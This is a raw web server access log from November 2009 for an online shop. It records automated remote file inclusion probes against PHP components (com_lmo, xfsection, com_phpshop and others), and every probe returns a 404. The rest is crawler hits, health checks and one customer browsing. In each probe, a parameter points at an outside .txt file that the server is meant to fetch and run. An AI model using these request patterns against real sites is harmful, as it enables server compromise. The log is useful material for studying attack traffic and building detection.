72.55.165.80 - - [26/Nov/2009:03:27:01 -0500] "GET ///components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:03:27:01 -0500] "GET /logs///components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:03:27:12 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:03:27:12 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:03:27:12 -0500] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:03:28:36 -0500] "GET /logs/access_log.Q109082900%20%20///components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:03:28:37 -0500] "GET /logs/access_log.Q109051200//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.55.165.80 - - [26/Nov/2009:03:28:51 -0500] "GET /logs/access_log.Q109092500%20%20///components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.divasvip.com.mx/fx29id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:28:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:28:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:28:51 -0500] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:29:14 -0500] "GET /logs/error_log.Q109100300%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:29:14 -0500] "GET /logs/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:29:14 -0500] "GET /index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:03:29:39 -0500] "GET /logs/error_log.Q109111600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.110.22.144 - - [26/Nov/2009:03:29:41 -0500] "GET /index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:29:41 -0500] "GET /logs/error_log.Q109100300%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:29:41 -0500] "GET /logs/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:29:55 -0500] "GET /logs/access_log.Q109051200//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.71.237.150 - - [26/Nov/2009:03:30:28 -0500] "GET /logs/error_log.Q109062800///modules/4nAlbum/public/displayCategory.php?basepath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
209.172.33.230 - - [26/Nov/2009:03:30:29 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:03:30:55 -0500] "GET /logs/access_log.Q109051200%20%20//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:30:55 -0500] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:03:30:08 -0500] "GET /logs/access_log.Q109111700 HTTP/1.0" 200 6954149 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.110.22.144 - - [26/Nov/2009:03:31:13 -0500] "GET /index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:31:13 -0500] "GET /logs/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:31:13 -0500] "GET /logs/error_log.Q109100300%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:03:31:21 -0500] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:31:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.110.22.144 - - [26/Nov/2009:03:32:50 -0500] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:26 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:26 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:26 -0500] "GET /logs/access_log.Q109092500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:29 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:29 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:33:29 -0500] "GET /logs/access_log.Q109092500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:33:48 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:03:33:56 -0500] "GET /logs/access_log.Q109051200%20%20//modules/xfsection/modify.php?dir_module=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:03:34:39 -0500] "GET /logs/access_log.Q109081500//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:03:35:05 -0500] "GET /scripts/dqm_loader.js HTTP/1.0" 200 3374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.139.67.116 - - [26/Nov/2009:03:35:45 -0500] "GET /logs/access_log.Q109092500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:03:35:50 -0500] "GET /logs/access_log.Q109092500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:03:35:38 -0500] "GET /logs/error_log.Q109112500 HTTP/1.0" 200 1642869 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [26/Nov/2009:03:35:53 -0500] "GET /logs/error_log.Q109112500 HTTP/1.0" 200 1642869 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Nov/2009:03:36:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [26/Nov/2009:03:36:56 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76938 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:57 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:58 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:36:59 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:02 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:06 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG HTTP/1.1" 200 37512 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:08 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:37:09 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CA5E8D41C0007C3C08D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
